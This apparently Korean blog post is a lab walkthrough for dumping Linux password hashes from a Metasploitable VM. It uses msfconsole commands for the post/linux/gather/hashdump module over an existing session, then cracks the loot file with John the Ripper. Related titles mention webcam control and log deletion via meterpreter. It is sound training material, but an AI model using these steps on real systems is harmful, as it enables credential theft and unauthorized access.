Self-Improvement
세션을 이용한 post/hashdump (패스워드 크랙) 실습 본문
*세션을 이용한 post/hashdump(패스워드 크랙) 실습
Attacker : kali
Victim : metasploitable
※Victim에 여러 취약점 공격을 통하여 Session이 연결되어 있어야함
(kali)
msf > sessions
msf > use post/linux/gather/hashdump
msf > show options
msf > set session 1
msf > show options
msf > exploit
msf > exit -y
#john /root/.msf4/loot/20180105141842_default_192.168.10.134_linux.hashes_958442.txt
툴을 이용하여 해당 파일의 암호를 크랙을 하면 된다.
'Kali Linux > Metasploitable' 카테고리의 다른 글
NFS Exported Share Information Disclosure 취약점 (0) | 2018.10.21 |
---|---|
Bind Shell Backdoor Detection 취약점 (0) | 2018.10.21 |
meterpreter을 이용한 노트북 webcam 제어 (0) | 2018.10.21 |
meterpreter을 이용한 Windows 2008 R2의 로그 삭제 (0) | 2018.10.21 |
meterpreter를 이용한 Reverse_TCP 공격 (msfvenom) (0) | 2018.10.21 |